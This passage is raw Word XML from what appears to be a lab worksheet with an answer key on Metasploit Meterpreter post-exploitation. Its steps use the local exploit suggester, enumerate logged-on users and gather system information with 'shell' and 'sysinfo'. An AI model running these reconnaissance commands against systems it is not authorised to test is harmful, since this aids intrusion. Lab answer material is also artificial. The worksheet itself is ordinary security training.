            <wp:extent cx="4791075" cy="124895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813" cy="12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8A95" w14:textId="77777777" w:rsidR="00416F1A" w:rsidRPr="001B002F" w:rsidRDefault="00416F1A" w:rsidP="00416F1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>You can also use Meterpreter's local exploit suggester to find possible exploits.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01AC6E18" w14:textId="77777777" w:rsidR="00416F1A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  <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Note:</w:t>
      </w:r>
      <w:r w:rsidRPr="001B002F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> The exploit suggester is just that: a suggestion. Keep in mind that the listed suggestions may not include all available exploits.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F083AC7" w14:textId="77777777" w:rsidR="00416F1A" w:rsidRPr="00F97D19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use post/multi/recon/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>local_exploit_suggester</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="58B6A18D" w14:textId="047F64F6" w:rsidR="00416F1A" w:rsidRPr="00416F1A" w:rsidRDefault="00416F1A" w:rsidP="00416F1A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416F1A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0932BE6D" w14:textId="0855A564" w:rsidR="00416F1A" w:rsidRPr="001B002F" w:rsidRDefault="00416F1A" w:rsidP="00416F1A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1B002F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bonus</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC01A16" w14:textId="77777777" w:rsidR="00416F1A" w:rsidRPr="001B002F" w:rsidRDefault="00416F1A" w:rsidP="00416F1A">
      <w:pP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 xml:space="preserve">A. Run a Meterpreter </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001B002F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>post script</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001B002F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> that enumerates all logged on users.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B5B611" w14:textId="77777777" w:rsidR="00416F1A" w:rsidRDefault="00416F1A" w:rsidP="00416F1A">
      <w:pPr>
        <w:spacing w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B002F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Answer: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run post/windows/gather/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>enum_logged_on_users</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="741673FA" w14:textId="77777777" w:rsidR="00416F1A" w:rsidRPr="003C0A8F" w:rsidRDefault="00416F1A" w:rsidP="00416F1A">
      <w:pPr>
        <w:spacing w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C83446">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1868EE8C" wp14:editId="06CCC9EA">
            <wp:extent cx="3305175" cy="165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1455" cy="17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3ACE" w14:textId="77777777" w:rsidR="00416F1A" w:rsidRPr="001B002F" w:rsidRDefault="00416F1A" w:rsidP="00416F1A">
      <w:pP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>B. Open a Meterpreter shell and gather system information for the target.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F18A369" w14:textId="342D5BEE" w:rsidR="00416F1A" w:rsidRDefault="00416F1A" w:rsidP="00416F1A">
      <w:pPr>
        <w:spacing w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B002F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Answer:</w:t>
      </w:r>
      <w:r w:rsidR="00427417">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00427417">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B2C8FDA" w14:textId="79701526" w:rsidR="00427417" w:rsidRPr="00427417" w:rsidRDefault="00427417" w:rsidP="00416F1A">
      <w:pPr>
        <w:spacing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proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sysinfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6F41E449" w14:textId="77777777" w:rsidR="00416F1A" w:rsidRPr="001B002F" w:rsidRDefault="00416F1A" w:rsidP="00416F1A">
      <w:pPr>
        <w:spacing w:before="100"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>C. Run the command that displays the target's computer system information:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DDFA926" w14:textId="6FC2E449" w:rsidR="00416F1A" w:rsidRPr="001B002F" w:rsidRDefault="00416F1A" w:rsidP="00416F1A">
      <w:pPr>
        <w:spacing w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B002F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Answer:</w:t>
      </w:r>
      <w:r w:rsidR="00BA4D3D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00BA4D3D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>sysinfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="33770796" w14:textId="77777777" w:rsidR="00416F1A" w:rsidRDefault="00416F1A" w:rsidP="001A266E">
      <w:pPr>
        <w:pStyle w:val="Body"/>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00416F1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8DF42" w14:textId="77777777" w:rsidR="00A4045D" w:rsidRDefault="00A4045D">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="7EB04A74" w14:textId="77777777" w:rsidR="00A4045D" w:rsidRDefault="00A4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637E9" w14:textId="77777777" w:rsidR="00E95EDE" w:rsidRDefault="00E95ED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F5229" w14:textId="77777777" w:rsidR="00A4045D" w:rsidRDefault="00A4045D">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="24590748" w14:textId="77777777" w:rsidR="00A4045D" w:rsidRDefault="00A40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EE8CF" w14:textId="77777777" w:rsidR="00E95EDE" w:rsidRDefault="00E95ED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55B0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="93860678"/>
    <w:numStyleLink w:val="ImportedStyle1"/>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="368F41F0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9E0E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C6BF2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="93860678"/>
    <w:styleLink w:val="ImportedStyle1"/>
    <w:lvl w:ilvl="0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96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7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4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EDE"/>
    <w:rsid w:val="001A266E"/>
    <w:rsid w:val="001E211A"/>
    <w:rsid w:val="00277454"/>
    <w:rsid w:val="002B26B2"/>
    <w:rsid w:val="003E5DAA"/>
    <w:rsid w:val="00416F1A"/>
    <w:rsid w:val="00427417"/>
    <w:rsid w:val="00483D66"/>
    <w:rsid w:val="004E113C"/>
    <w:rsid w:val="00557001"/>
    <w:rsid w:val="00607AB7"/>
    <w:rsid w:val="00722A4A"/>
    <w:rsid w:val="00724679"/>
    <w:rsid w:val="00861175"/>
    <w:rsid w:val="00886C25"/>
    <w:rsid w:val="00A4045D"/>
    <w:rsid w:val="00A436A1"/>
    <w:rsid w:val="00A92E7E"/>
    <w:rsid w:val="00A96E06"/>
    <w:rsid w:val="00B55B06"/>
    <w:rsid w:val="00BA4D3D"/>
    <w:rsid w:val="00C24335"/>
    <w:rsid w:val="00CC145C"/>
    <w:rsid w:val="00E72030"/>
    <w:rsid w:val="00E95EDE"/>
    <w:rsid w:val="00F12886"/>
    <w:rsid w:val="00F27608"/>
    <w:rsid w:val="00F357A6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5084"/>
  <w15:docId w15:val="{DF25CE6B-40C0-454D-9F50-A0246AD5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36"/>
      <w:szCs w:val="36"/>
      <w:u w:val="single" w:color="0563C1"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFF00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Keith Matlock</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-09-27T03:40:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-09-27T03:40:00Z</dcterms:modified>
</cp:coreProperties>
</file>